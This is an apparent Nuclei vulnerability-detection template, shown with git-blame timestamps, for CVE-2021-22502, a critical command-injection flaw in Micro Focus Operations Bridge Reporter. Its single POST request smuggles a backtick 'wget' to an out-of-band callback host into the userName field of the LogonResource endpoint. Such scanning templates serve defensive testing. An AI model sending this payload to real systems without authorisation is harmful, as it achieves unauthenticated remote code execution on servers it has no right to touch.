2021-03-03 02:29:45 +00:00
|
|
|
id: CVE-2021-22502
|
|
|
|
|
|
|
|
info:
|
2023-04-12 19:26:03 +00:00
|
|
|
name: Micro Focus Operations Bridge Reporter - Remote Code Execution
|
2021-03-03 02:29:45 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
2023-03-30 17:11:53 +00:00
|
|
|
description: |
|
2023-04-12 19:26:03 +00:00
|
|
|
Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability.
|
2023-03-30 17:11:53 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
|
2023-03-31 11:23:57 +00:00
|
|
|
- https://softwaresupport.softwaregrp.com/doc/KM03775947
|
|
|
|
- https://www.zerodayinitiative.com/advisories/ZDI-21-153/
|
2023-04-12 19:26:03 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22502
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://www.zerodayinitiative.com/advisories/ZDI-21-154/
|
2023-03-30 17:11:53 +00:00
|
|
|
classification:
|
2023-03-31 11:23:57 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
2023-03-30 17:11:53 +00:00
|
|
|
cve-id: CVE-2021-22502
|
2023-03-31 11:23:57 +00:00
|
|
|
cwe-id: CWE-78
|
2023-11-09 06:04:52 +00:00
|
|
|
epss-score: 0.96129
|
2023-11-20 05:10:39 +00:00
|
|
|
epss-percentile: 0.99355
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: microfocus
|
|
|
|
product: operation_bridge_reporter
|
|
|
|
tags: cve,cve2021,microfocus,obr,rce,kev
|
2021-03-03 02:29:45 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-03-03 02:29:45 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /AdminService/urest/v1/LogonResource HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
2023-03-30 17:11:53 +00:00
|
|
|
{"userName":"something `wget {{interactsh-url}}`","credential":"whatever"}
|
2021-03-03 02:29:45 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-03-30 17:11:53 +00:00
|
|
|
part: interactsh_protocol
|
2021-03-03 02:29:45 +00:00
|
|
|
words:
|
2023-03-30 17:11:53 +00:00
|
|
|
- "http"
|
|
|
|
- "dns"
|
2021-03-03 02:29:45 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
2023-03-30 17:11:53 +00:00
|
|
|
words:
|
|
|
|
- "An error occurred"
|
|
|
|
- "AUTHENTICATION_FAILED"
|
2021-03-03 02:29:45 +00:00
|
|
|
condition: and
|
|
|
|
|
2023-03-30 17:11:53 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
|
2021-03-03 02:29:45 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 401
|
2023-11-19 08:30:54 +00:00
|
|
|
|
|
|
|
# digest: 4a0a0047304502205c37261d08f99c592bc5b850577bf00a9fad2b18dc5e65be14f5058863cc4090022100dfb6b7791625c23d24f5883edf3cddc8b3b822995b841fa480ceb3147a0796aa:922c64590222798bb761d5b6d8e72950
|